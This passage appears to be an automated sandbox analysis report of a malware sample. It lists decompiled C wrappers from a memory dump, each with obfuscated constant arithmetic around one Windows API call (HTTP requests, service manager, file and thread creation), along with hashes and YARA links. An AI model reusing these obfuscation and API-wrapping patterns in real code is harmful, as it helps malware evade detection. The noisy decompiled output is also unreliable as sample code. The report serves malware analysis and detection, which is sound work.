Opcode Fuzzy Hash: 11f0a768391377fe69868ce35b1527178b61e9fcd2d284546a7f3ae16540a2da
Instruction Fuzzy Hash: 7F21E0B1801249BBCF14CFA6DD49CDFBFB9EB86704F108199F910A2220D3B59A15DFA1

Uniqueness

Uniqueness Score: -1.00%

Function 1000BEDE, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57COMMON

Download Yara Rule

APIs

QueryFullProcessImageNameW.KERNEL32(007CD4C5,00000000,00000000,31305EC1), ref: 1000BFB0

Strings

^.c, xrefs: 1000BF25
=., xrefs: 1000BF6D

Memory Dump Source

Source File: 00000008.00000002.879826400.0000000010001000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.879795728.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.879874908.0000000010025000.00000004.00000001.sdmp Download File

Similarity

API ID: FullImageNameProcessQuery
String ID: =.$^.c
API String ID: 3578328331-3776521896
Opcode ID: 07ae75dd8ddba432c77965de32a51c1b19153ce4c2545f6c391e89c1662625bf
Instruction ID: 7275a9ed560c09780dabca557c474df7feafaa640da0da3fdedc6977ea339cbe
Opcode Fuzzy Hash: 07ae75dd8ddba432c77965de32a51c1b19153ce4c2545f6c391e89c1662625bf
Instruction Fuzzy Hash: 40213475C00209FBDF18CFA4C84AAEEBFB1FB40704F208588E91476250D3B19B619F90

Uniqueness

Uniqueness Score: -1.00%

Function 1000FBFA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E1000FBFA(void* __ecx, void* __edx, intOrPtr _a4, void* _a8) {
				unsigned int _v8;
				signed int _v12;
				unsigned int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void* _t48;
				int _t57;
				signed int _t59;

				_push(_a8);
				_push(_a4);
				E10022523(_t48);
				_v28 = _v28 & 0x00000000;
				_v24 = _v24 & 0x00000000;
				_v36 = 0x49672e;
				_v32 = 0xb6dd69;
				_v16 = 0x714492;
				_v16 = _v16 >> 4;
				_v16 = _v16 + 0x8cae;
				_v16 = _v16 + 0xf12f;
				_v16 = _v16 ^ 0x0001c43a;
				_v20 = 0xe1aff5;
				_v20 = _v20 + 0x563d;
				_v20 = _v20 ^ 0x00ec4f92;
				_v12 = 0xff415;
				_v12 = _v12 + 0x39cf;
				_v12 = _v12 | 0x79f6ff5d;
				_v12 = _v12 ^ 0x79f7d296;
				_v8 = 0xdebe32;
				_t59 = 0x1e;
				_v8 = _v8 / _t59;
				_v8 = _v8 >> 0xe;
				_v8 = _v8 >> 0xe;
				_v8 = _v8 ^ 0x0002d9b6;
				E10002309(0x336, _t59, _t59, 0xd09d8658, _t59, 0x9c9047d0);
				_t57 = FindClose(_a8); // executed
				return _t57;
			}

0x1000fc00
0x1000fc03
0x1000fc08
0x1000fc0d
0x1000fc14
0x1000fc1a
0x1000fc21
0x1000fc28
0x1000fc2f
0x1000fc33
0x1000fc3a
0x1000fc41
0x1000fc48
0x1000fc4f
0x1000fc56
0x1000fc5d
0x1000fc64
0x1000fc6b
0x1000fc72
0x1000fc79
0x1000fc85
0x1000fc8d
0x1000fc90
0x1000fc94
0x1000fc98
0x1000fcb8
0x1000fcc3
0x1000fcc8

APIs

FindClose.KERNEL32(0001C43A), ref: 1000FCC3

Strings

=V, xrefs: 1000FC4F
.gI, xrefs: 1000FC1A

Memory Dump Source

Source File: 00000008.00000002.879826400.0000000010001000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.879795728.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.879874908.0000000010025000.00000004.00000001.sdmp Download File

Similarity

API ID: CloseFind
String ID: .gI$=V
API String ID: 1863332320-2530093900
Opcode ID: 110af252eeec9babbf3e3997d431909c73a56f909e67471b0c3fb51db6a30985
Instruction ID: 13a99136c5b08d47dc1f4c8c5ed125b3ab52959e5c24daba2c8c9d4d8457441f
Opcode Fuzzy Hash: 110af252eeec9babbf3e3997d431909c73a56f909e67471b0c3fb51db6a30985
Instruction Fuzzy Hash: 8B2133B5D0020CEFEB04CFD5D94AAEEBBB0FB54318F10C199E52466240E3B95B589F90

Uniqueness

Uniqueness Score: -1.00%

Function 1001E9E8, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50
fileCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E1001E9E8(void* __ecx, void* __edx, struct _WIN32_FIND_DATAW* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				void* _t39;
				int _t47;
				void* _t51;

				_push(_a16);
				_t51 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E10022523(_t39);
				_v24 = _v24 & 0x00000000;
				_v28 = 0x7dd1c2;
				_v20 = 0xe6ed41;
				_v20 = _v20 ^ 0x6eedbecd;
				_v20 = _v20 * 0x45;
				_v20 = _v20 ^ 0xa90eba26;
				_v16 = 0x25fde1;
				_v16 = _v16 + 0xffffc5d1;
				_v16 = _v16 | 0x325ad611;
				_v16 = _v16 ^ 0x3277e624;
				_v8 = 0x448e1b;
				_v8 = _v8 | 0xd7f3ffef;
				_v8 = _v8 ^ 0xcff08007;
				_v8 = _v8 ^ 0x180d74c6;
				_v12 = 0x3a9cbc;
				_v12 = _v12 | 0xfe729dd7;
				_v12 = _v12 ^ 0xfe7a3202;
				E10002309(0x2de, __ecx, __ecx, 0xa7d3fbc8, __ecx, 0x9c9047d0);
				_t47 = FindNextFileW(_t51, _a4); // executed
				return _t47;
			}

0x1001e9ef
0x1001e9f2
0x1001e9f4
0x1001e9f7
0x1001e9fa
0x1001e9fe
0x1001e9ff
0x1001ea04
0x1001ea0b
0x1001ea12
0x1001ea19
0x1001ea30
0x1001ea33
0x1001ea3a
0x1001ea41
0x1001ea48
0x1001ea4f
0x1001ea56
0x1001ea5d
0x1001ea64
0x1001ea6b
0x1001ea72
0x1001ea79
0x1001ea80
0x1001ea99
0x1001eaa5
0x1001eaab

APIs

FindNextFileW.KERNELBASE(00000000,FE7A3202,?,?,?,?,?,?,?,?,?,?,00000072), ref: 1001EAA5

Strings

A, xrefs: 1001EA12
$w2, xrefs: 1001EA4F

Memory Dump Source

Source File: 00000008.00000002.879826400.0000000010001000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.879795728.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.879874908.0000000010025000.00000004.00000001.sdmp Download File

Similarity

API ID: FileFindNext
String ID: $w2$A
API String ID: 2029273394-2068021171
Opcode ID: 489ae82eb01001db2e27a8813198e8620566e78ec9ea4fd3dbf43d66dbc97652
Instruction ID: dada94e113a69792e10164e03f2a25d9c6497d738665c24ecae0a8d857d7b4ee
Opcode Fuzzy Hash: 489ae82eb01001db2e27a8813198e8620566e78ec9ea4fd3dbf43d66dbc97652
Instruction Fuzzy Hash: 75110DB5C0121DABCF05DFE8DA068AEBFB4FB00300F108589E915A6260E3B55B209FA5

Uniqueness

Uniqueness Score: -1.00%

Function 10008A5E, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 68
networkCOMMON

Download Yara Rule

C-Code - Quality: 47%

			E10008A5E(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, long _a24, WCHAR* _a36, intOrPtr _a44, intOrPtr _a48, intOrPtr _a52, WCHAR* _a56) {
				signed int _v8;
				signed int _v12;
				unsigned int _v16;
				signed int _v20;
				WCHAR* _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _t45;
				void* _t52;
				void* _t57;

				_push(_a56);
				_t57 = __edx;
				_push(_a52);
				_push(_a48);
				_push(_a44);
				_push(0);
				_push(_a36);
				_push(0);
				_push(0);
				_push(_a24);
				_push(0);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E10022523(_t45);
				_v32 = 0xd5d112;
				_v28 = 0x50513d;
				_v24 = 0;
				_v12 = 0x46c43;
				_v12 = _v12 + 0xffffdfef;
				_v12 = _v12 | 0x9d8b3e1d;
				_v12 = _v12 ^ 0x9d8347af;
				_v20 = 0x816eb9;
				_v20 = _v20 + 0xffff29e2;
				_v20 = _v20 ^ 0x0080c9d8;
				_v8 = 0x807982;
				_v8 = _v8 | 0x5015719e;
				_v8 = _v8 ^ 0xfbfa9e2f;
				_v8 = _v8 ^ 0xab6f9dce;
				_v16 = 0xec1576;
				_v16 = _v16 >> 0xb;
				_v16 = _v16 ^ 0x000e8763;
				E10002309(0x18c, __ecx, __ecx, 0xb50c381d, __ecx, 0xc0cf1a4);
				_t52 = HttpOpenRequestW(_t57, _a36, _a56, 0, 0, 0, _a24, 0); // executed
				return _t52;
			}

0x10008a66
0x10008a6b
0x10008a6d
0x10008a70
0x10008a73
0x10008a76
0x10008a77
0x10008a7a
0x10008a7b
0x10008a7c
0x10008a7f
0x10008a80
0x10008a83
0x10008a86
0x10008a89
0x10008a8c
0x10008a8d
0x10008a8e
0x10008a93
0x10008a9d
0x10008aa4
0x10008aa7
0x10008aae
0x10008ab5
0x10008abc
0x10008ac3
0x10008aca
0x10008ad1
0x10008ad8
0x10008adf
0x10008ae6
0x10008aed
0x10008af4
0x10008afb
0x10008aff
0x10008b24
0x10008b3a
0x10008b41

APIs

HttpOpenRequestW.WININET(?,?,?,00000000,00000000,00000000,00D5D112,00000000), ref: 10008B3A

Strings

=QP, xrefs: 10008A9D

Memory Dump Source

Source File: 00000008.00000002.879826400.0000000010001000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.879795728.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.879874908.0000000010025000.00000004.00000001.sdmp Download File

Similarity

API ID: HttpOpenRequest
String ID: =QP
API String ID: 1984915467-456757808
Opcode ID: 4cc3d4786cdcc23149290c3469cd4bf7c683ba33055c948049ab044fbc38bf75
Instruction ID: e3fac8015c3a145f5e17db1b8b22e466714549d15e7afe1ebd96c96d83fff2fb
Opcode Fuzzy Hash: 4cc3d4786cdcc23149290c3469cd4bf7c683ba33055c948049ab044fbc38bf75
Instruction Fuzzy Hash: E321F0B2801208BB8F559F95CC4ACDFBF79EF85700F108148B914A6221D3B18A65DFA0

Uniqueness

Uniqueness Score: -1.00%

Function 100142E4, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 66
memoryCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E100142E4(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				long _v24;
				long _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void* _t43;
				char _t54;
				signed int _t57;
				void* _t62;
				void* _t63;

				_push(_a20);
				_t62 = __edx;
				_push(_a16);
				_t63 = __ecx;
				_push(0);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E10022523(_t43);
				_v36 = 0xead706;
				_v32 = 0x8aaadf;
				_v28 = 0;
				_v24 = 0;
				_v12 = 0x3b6f9b;
				_t57 = 0x3f;
				_v12 = _v12 * 0xe;
				_v12 = _v12 << 0x10;
				_v12 = _v12 ^ 0x1a7fe3f0;
				_v20 = 0x6318b1;
				_v20 = _v20 | 0x2b2fc1f2;
				_v20 = _v20 ^ 0x2b6f417a;
				_v8 = 0xeb56a2;
				_v8 = _v8 << 1;
				_v8 = _v8 / _t57;
				_v8 = _v8 * 0x2f;
				_v8 = _v8 ^ 0x015d5ff9;
				_v16 = 0x2619ef;
				_v16 = _v16 << 6;
				_v16 = _v16 ^ 0x098e35d6;
				E10002309(_t57 + 0x4d, _t57, _t57, 0x52f9059f, _t57, 0x9c9047d0);
				_t54 = RtlFreeHeap(_t62, 0, _t63); // executed
				return _t54;
			}

APIs

RtlFreeHeap.NTDLL(00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,072B1AC5,00000000,00000000), ref: 100143AA

Strings

zAo+, xrefs: 10014350

Memory Dump Source

Source File: 00000008.00000002.879826400.0000000010001000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.879795728.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.879874908.0000000010025000.00000004.00000001.sdmp Download File

Similarity

API ID: FreeHeap
String ID: zAo+
API String ID: 3298025750-440923707
Opcode ID: 782d704bb29470d0423d04c6355d4fda0cb05a54fe280a973ff5c90c0f5ad215
Instruction ID: 613f1e34ca62f437a9a883da1f6942e021cbcbe0c1bd7b5908013fed4c35e44f
Opcode Fuzzy Hash: 782d704bb29470d0423d04c6355d4fda0cb05a54fe280a973ff5c90c0f5ad215
Instruction Fuzzy Hash: 4D2128B1D00218FF9B08CF99D98A8EEBFB9FB44344F508199E515A7240D3B05B149B90

Uniqueness

Uniqueness Score: -1.00%

Function 1000F2CC, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 57
networkCOMMON

Download Yara Rule

C-Code - Quality: 24%

			E1000F2CC(void* __edx, intOrPtr _a4, intOrPtr _a8, long _a12, intOrPtr _a32) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				WCHAR* _v24;
				intOrPtr _v28;
				void* __ecx;
				void* _t36;
				void* _t44;
				void* _t46;

				_push(_a32);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				E10022523(_t36);
				_v28 = 0x481ca4;
				_v24 = 0;
				_v20 = 0xca1952;
				_v20 = _v20 ^ 0x1684c8f8;
				_v20 = _v20 ^ 0x16482d99;
				_v12 = 0xc193bc;
				_v12 = _v12 ^ 0x27e4a297;
				_v12 = _v12 | 0xa7673761;
				_v12 = _v12 ^ 0xa76f04da;
				_v8 = 0xc5b902;
				_push(0xc0cf1a4);
				_push(_t45);
				_push(0xb325898b);
				_push(_t45);
				_v8 = _v8 * 0x4e;
				_v8 = _v8 >> 4;
				_v8 = _v8 ^ 0x03c56f69;
				_v16 = 0x24ec4f;
				_v16 = _v16 + 0xffffc13d;
				_v16 = _v16 ^ 0x002fbbc3;
				_push(_t45);
				_t46 = 0x50;
				E10002309(_t46);
				_t44 = InternetOpenW(0, _a12, 0, 0, 0); // executed
				return _t44;
			}

0x1000f2d3
0x1000f2d8
0x1000f2d9
0x1000f2da
0x1000f2db
0x1000f2dc
0x1000f2df
0x1000f2e2
0x1000f2e7
0x1000f2ec
0x1000f2f6
0x1000f2f9
0x1000f300
0x1000f307
0x1000f30e
0x1000f315
0x1000f31c
0x1000f323
0x1000f32a
0x1000f335
0x1000f33a
0x1000f33b
0x1000f340
0x1000f341
0x1000f344
0x1000f348
0x1000f34f
0x1000f356
0x1000f35d
0x1000f370
0x1000f373
0x1000f374
0x1000f383
0x1000f389

APIs

InternetOpenW.WININET(00000000,16482D99,00000000,00000000,00000000), ref: 1000F383

Strings

O$, xrefs: 1000F34F

Memory Dump Source

Source File: 00000008.00000002.879826400.0000000010001000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.879795728.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.879874908.0000000010025000.00000004.00000001.sdmp Download File

Similarity

API ID: InternetOpen
String ID: O$
API String ID: 2038078732-838329570
Opcode ID: bfd598ea9fc20005dd18c51756325e876dca57c81b5a8b40325e3a3f8c113345
Instruction ID: 8289a683938989030ca0da7dfac6b892ab059c1ea5f0d65067220e4f4b31d72f
Opcode Fuzzy Hash: bfd598ea9fc20005dd18c51756325e876dca57c81b5a8b40325e3a3f8c113345
Instruction Fuzzy Hash: FA1113B1C0122DBB9B15DFA58C4A8DFBFB8EF05654F108589F814A6110C3B15A54DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 1000E0A2, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

GetNativeSystemInfo.KERNEL32 ref: 1000E168

Strings

|p, xrefs: 1000E0FA

Memory Dump Source

Source File: 00000008.00000002.879826400.0000000010001000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.879795728.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.879874908.0000000010025000.00000004.00000001.sdmp Download File

Similarity

API ID: InfoNativeSystem
String ID: |p
API String ID: 1721193555-2455131449
Opcode ID: 1373000f67fd09352ab480020baae7fa00b59f1f2ab89e5c019d1be64afd4c0b
Instruction ID: 87fad81da9970c7bb3d4b7ae9dd0f5802466cf3bbb0c04d9c31e1761e8e9e04e
Opcode Fuzzy Hash: 1373000f67fd09352ab480020baae7fa00b59f1f2ab89e5c019d1be64afd4c0b
Instruction Fuzzy Hash: 662138B6D00318FFDB48CFA4C8468EEBBB4FB44310F108599E41566291D3B85B50CF90

Uniqueness

Uniqueness Score: -1.00%

Function 1001FE9D, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 26%

			E1001FE9D(void* __edx, intOrPtr _a4, intOrPtr _a8, int _a16) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				short* _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* __ecx;
				void* _t34;
				void* _t41;
				void* _t43;

				_push(_a16);
				_push(0);
				_push(_a8);
				_push(_a4);
				_push(0);
				E10022523(_t34);
				_v32 = 0xfebeef;
				_v28 = 0x6b4d4f;
				_v24 = 0;
				_v20 = 0x72d4d3;
				_v20 = _v20 + 0x7ce2;
				_v20 = _v20 ^ 0x0072d8bc;
				_v16 = 0x618a6;
				_v16 = _v16 + 0x2ac;
				_v16 = _v16 ^ 0x00083b16;
				_v12 = 0x17740f;
				_v12 = _v12 + 0x9d82;
				_v12 = _v12 ^ 0x0012bdfc;
				_v8 = 0xba692b;
				_v8 = _v8 ^ 0x31422697;
				_v8 = _v8 >> 0x10;
				_v8 = _v8 ^ 0x0005552e;
				_push(0x21ce39be);
				_push(0xb53dc03);
				_push(_t42);
				_push(_t42);
				_t43 = 0x15;
				E10002309(_t43);
				_t41 = OpenSCManagerW(0, 0, _a16); // executed
				return _t41;
			}

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,10015191,?,?,?,?,?,?,?,?,?,?,0EB411AB), ref: 1001FF4C

Strings

OMk, xrefs: 1001FEC1

Memory Dump Source

Source File: 00000008.00000002.879826400.0000000010001000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.879795728.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.879874908.0000000010025000.00000004.00000001.sdmp Download File

Similarity

API ID: ManagerOpen
String ID: OMk
API String ID: 1889721586-456170103
Opcode ID: d1e283b7febcfdf4bdf6f7a65a9942aadab0ed956acd7b7642cec6b73cd3d803
Instruction ID: 1d80d5bf462f7d76a803e315767f53b854081a7213ef634c08bc69ad92fa0287
Opcode Fuzzy Hash: d1e283b7febcfdf4bdf6f7a65a9942aadab0ed956acd7b7642cec6b73cd3d803
Instruction Fuzzy Hash: 6D1113B2C0022CBBEB11DFA5D94A8EFBFB4EF44318F108188E91466201D3B95B149B91

Uniqueness

Uniqueness Score: -1.00%

Function 1001199D, Relevance: 1.6, APIs: 1, Instructions: 71
fileCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E1001199D(void* __edx, WCHAR* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, long _a20, long _a24, long _a28, long _a32, intOrPtr _a36) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t55;
				void* _t68;
				signed int _t69;
				signed int _t70;

				_push(0);
				_push(_a36);
				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(0);
				E10022523(_t55);
				_v12 = 0xd4f63c;
				_v12 = _v12 >> 7;
				_v12 = _v12 << 0xf;
				_v12 = _v12 + 0xffffff46;
				_v12 = _v12 ^ 0xd4fb5fe8;
				_v8 = 0x967d18;
				_v8 = _v8 + 0xffffef98;
				_t69 = 0x14;
				_v8 = _v8 / _t69;
				_t70 = 0x4a;
				_v8 = _v8 / _t70;
				_v8 = _v8 ^ 0x000a0722;
				_v20 = 0x4653bc;
				_v20 = _v20 * 0x70;
				_v20 = _v20 ^ 0x1ec2604c;
				_v16 = 0x7577a9;
				_v16 = _v16 * 0x3c;
				_v16 = _v16 ^ 0x1b87e59a;
				E10002309(0x10a, _t70, _t70, 0xb484d458, _t70, 0x9c9047d0);
				_t68 = CreateFileW(_a4, _a24, _a28, 0, _a32, _a20, 0); // executed
				return _t68;
			}

APIs

CreateFileW.KERNEL32(?,?,?,00000000,?,?,00000000), ref: 10011A79

Memory Dump Source

Source File: 00000008.00000002.879826400.0000000010001000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.879795728.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.879874908.0000000010025000.00000004.00000001.sdmp Download File

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 8a2d25935346c61c613306e80470cb2899605f47af9ce82126dccb95390cfdca
Instruction ID: 4460bfc2ec69cb6a9c9d4ae8ab6b4977e7447a0d843199ae8caee7af6f2384ce
Opcode Fuzzy Hash: 8a2d25935346c61c613306e80470cb2899605f47af9ce82126dccb95390cfdca
Instruction Fuzzy Hash: E021E27280021DFBDF05CF95D8498DEBFB6EF49354F108188F91466260D3B69A61AF90

Uniqueness

Uniqueness Score: -1.00%

Function 100230FB, Relevance: 1.6, APIs: 1, Instructions: 70
networkCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E100230FB(WCHAR* _a4, intOrPtr _a8, intOrPtr _a12, long _a16, intOrPtr _a20, void* _a24, intOrPtr _a32, intOrPtr _a36, signed int _a40, intOrPtr _a48) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				void* _t57;
				signed int _t58;
				short _t63;

				_t63 = _a40;
				_push(_a48);
				_push(0);
				_push(_t63 & 0x0000ffff);
				_push(_a36);
				_push(_a32);
				_push(0);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(0);
				_push(0);
				E10022523(_t63 & 0x0000ffff);
				_a40 = 0x441dde;
				_a40 = _a40 | 0xef6c71fd;
				_a40 = _a40 + 0xffff46ca;
				_a40 = _a40 ^ 0xef65f1b7;
				_v16 = 0x4e992b;
				_v16 = _v16 << 0xe;
				_v16 = _v16 ^ 0xa64ff1a5;
				_v12 = 0xdc7938;
				_t58 = 0x71;
				_v12 = _v12 / _t58;
				_v12 = _v12 << 5;
				_v12 = _v12 ^ 0x00369a6d;
				_v8 = 0xc2c26;
				_v8 = _v8 << 7;
				_v8 = _v8 << 3;
				_v8 = _v8 ^ 0x30b97202;
				E10002309(0x185, _t58, _t58, 0x3cfe7f69, _t58, 0xc0cf1a4);
				_t57 = InternetConnectW(_a24, _a4, _t63, 0, 0, _a16, 0, 0); // executed
				return _t57;
			}

0x10023102
0x10023106
0x1002310e
0x1002310f
0x10023110
0x10023113
0x10023116
0x10023117
0x1002311a
0x1002311d
0x10023120
0x10023123
0x10023126
0x10023129
0x1002312a
0x1002312b
0x10023130
0x1002313a
0x10023143
0x1002314a
0x10023151
0x10023158
0x1002315c
0x10023163
0x1002316f
0x10023177
0x1002317a
0x1002317e
0x10023185
0x1002318c
0x10023190
0x10023194
0x100231b4
0x100231ca
0x100231d1

APIs

InternetConnectW.WININET(?,00369A6D,?,00000000,00000000,?,00000000,00000000), ref: 100231CA

Memory Dump Source

Source File: 00000008.00000002.879826400.0000000010001000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.879795728.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.879874908.0000000010025000.00000004.00000001.sdmp Download File

Similarity

API ID: ConnectInternet
String ID:
API String ID: 3050416762-0
Opcode ID: a94079c84f44fd79cf2d8e21410448fccbf556cf6765277f06ac4260a9b0b9f5
Instruction ID: e8187c32b4ec5569a964266e9532cb42533e4eb402820abbfec73acb79da3654
Opcode Fuzzy Hash: a94079c84f44fd79cf2d8e21410448fccbf556cf6765277f06ac4260a9b0b9f5
Instruction Fuzzy Hash: 28212876900248BBDF01CFA6DC49CDFBFB9EB89B14F118149F92466220C7759A60DFA1

Uniqueness

Uniqueness Score: -1.00%

Function 100138CA, Relevance: 1.6, APIs: 1, Instructions: 63
threadCOMMON

Download Yara Rule

C-Code - Quality: 55%

			E100138CA(void* __ecx, intOrPtr _a8, _Unknown_base(*)()* _a12, void* _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a32, intOrPtr _a40) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t44;
				void* _t54;
				signed int _t56;

				_push(_a40);
				_push(0);
				_push(_a32);
				_push(0);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(0);
				_push(0);
				E10022523(_t44);
				_v8 = 0x81d8e3;
				_v8 = _v8 | 0x29cc6377;
				_t56 = 0x4e;
				_v8 = _v8 / _t56;
				_v8 = _v8 + 0xffff28cb;
				_v8 = _v8 ^ 0x008a8115;
				_v20 = 0x37a592;
				_v20 = _v20 | 0x4431b854;
				_v20 = _v20 ^ 0x44318d0b;
				_v16 = 0x83d7ad;
				_v16 = _v16 | 0x0c5d9c08;
				_v16 = _v16 ^ 0x0cde7e94;
				_v12 = 0xac61ec;
				_v12 = _v12 + 0xffff443d;
				_v12 = _v12 * 0x13;
				_v12 = _v12 ^ 0x0cbd13a0;
				E10002309(0x347, _t56, _t56, 0x49f4d21, _t56, 0x9c9047d0);
				_t54 = CreateThread(0, 0, _a12, _a16, 0, 0); // executed
				return _t54;
			}

0x100138d1
0x100138d6
0x100138d7
0x100138da
0x100138db
0x100138de
0x100138e1
0x100138e4
0x100138e7
0x100138ea
0x100138eb
0x100138ed
0x100138f2
0x100138fc
0x1001390a
0x10013912
0x10013915
0x1001391c
0x10013923
0x1001392a
0x10013931
0x10013938
0x1001393f
0x10013946
0x1001394d
0x10013954
0x10013967
0x1001396f
0x10013982
0x10013994
0x1001399a

APIs

CreateThread.KERNEL32(00000000,00000000,44318D0B,?,00000000,00000000), ref: 10013994

Memory Dump Source

Source File: 00000008.00000002.879826400.0000000010001000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.879795728.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.879874908.0000000010025000.00000004.00000001.sdmp Download File

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 4ee66b657200ea8511f1b49f91465a58aa226465ce330f2d495d8e9b8aa70771
Instruction ID: 5a6dbe2e242c64283d159b8d6af8574c24e4c451ce92a937a7e8d2536125472d
Opcode Fuzzy Hash: 4ee66b657200ea8511f1b49f91465a58aa226465ce330f2d495d8e9b8aa70771
Instruction Fuzzy Hash: 6921E275801219BBCF15CFE9DD4A8DFBFB9FF09214F108188F918A6120D3B19A249FA0

Uniqueness

Uniqueness Score: -1.00%

Function 10002985, Relevance: 1.6, APIs: 1, Instructions: 58
memoryCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E10002985(long __ecx, long __edx, intOrPtr _a4, void* _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				unsigned int _v20;
				void* _t43;
				void* _t53;
				signed int _t55;
				long _t60;
				long _t61;

				_push(_a12);
				_t60 = __edx;
				_t61 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E10022523(_t43);
				_v20 = 0x610f25;
				_v20 = _v20 ^ 0x98bdb346;
				_v20 = _v20 >> 3;
				_v20 = _v20 ^ 0x13199c72;
				_v16 = 0x24641b;
				_t55 = 0x72;
				_v16 = _v16 * 0x35;
				_v16 = _v16 ^ 0xfebd96de;
				_v16 = _v16 ^ 0xf931a9e3;
				_v12 = 0x6331a9;
				_v12 = _v12 >> 0xb;
				_v12 = _v12 / _t55;
				_v12 = _v12 ^ 0x0006f398;
				_v8 = 0x8145a8;
				_v8 = _v8 >> 0xa;
				_v8 = _v8 << 0xd;
				_v8 = _v8 + 0x8268;
				_v8 = _v8 ^ 0x0405b518;
				E10002309(_t55 + 0x5d, _t55, _t55, 0x9d19c04e, _t55, 0x9c9047d0);
				_t53 = RtlAllocateHeap(_a8, _t60, _t61); // executed
				return _t53;
			}

APIs

RtlAllocateHeap.NTDLL(F931A9E3,01AD2A76,65B9EDAF,?,?,?,?,?,?,?,?,00000000,229292B5), ref: 10002A3E

Memory Dump Source

Source File: 00000008.00000002.879826400.0000000010001000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.879795728.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.879874908.0000000010025000.00000004.00000001.sdmp Download File

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 138a33bbf657fc90b6a1f11ed01e494c992cf007267dd6aff1ee16601a01d635
Instruction ID: a28c389faf7b726d87918facb3c60479c9af1eed29e3a2ef13c7030710ba699e
Opcode Fuzzy Hash: 138a33bbf657fc90b6a1f11ed01e494c992cf007267dd6aff1ee16601a01d635
Instruction Fuzzy Hash: 84215372C00208BBDF18CFA8D84A8DEBFB5FB41710F108098E824A6210E3B4AB14DF90

Uniqueness

